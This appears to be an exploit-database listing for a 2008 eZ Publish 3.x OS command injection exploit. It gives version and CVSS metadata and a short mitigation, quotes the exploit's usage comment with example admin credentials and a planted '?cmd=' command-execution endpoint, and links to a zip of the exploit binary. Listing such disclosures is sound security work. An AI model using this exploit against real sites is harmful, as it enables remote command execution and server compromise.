eZ Publish OS Commanding executing exploit

vendor:

eZ Publish

by:

s4avrd0w

9.3

CVSS

HIGH

OS Command Injection

CWE

Product Name: eZ Publish

Affected Version From: 3.9.2000

Affected Version To: 3.10.2001

Patch Exists: YES

Related CWE: N/A

CPE: a:ezpublish:ez_publish

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

eZ Publish OS Commanding executing exploit

eZ Publish OS Commanding executing exploit is a zero-day exploit that allows an attacker to execute arbitrary OS commands on the vulnerable eZ Publish versions 3.x. The exploit requires the attacker to have the login credentials of an existing admin on eZ Publish. The attacker can then use the exploit to send a malicious payload to the target eZ Publish admin interface and execute arbitrary OS commands.

Mitigation:

Upgrade to the latest version of eZ Publish and ensure that the admin credentials are secure.

Source

Exploit-DB raw data:

/*
    eZ Publish OS Commanding executing exploit by s4avrd0w [s4avrd0w@p0c.ru]
    Versions affected 3.x
 
    * tested on version 3.9.0, 3.9.5, 3.10.1
 
    usage:  
 
    # ./eZPublish_abuse_of_functionality_zero_day -u=username -p=password -s=EZPublish_server
 
    The options are required:
 
    -u Login of the exists admin on eZ Publish
    -p Admin password on eZ Publish
    -s Target eZ Publish admin interface
 
    example:
 
    # ./eZPublish_abuse_of_functionality_zero_day -u=toor -p=P@ssw0rd -s=http://127.0.0.1/ezwebin_site_admin/
    [+] Exploit successfully sending
    [+] For OS Commanding executing go to: http://127.0.0.1/ezinfo/about?cmd=<OScommand>
*/

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/7421.zip (2008-eZPublish_abuse_of_functionality_zero_day.zip)

# milw0rm.com [2008-12-11]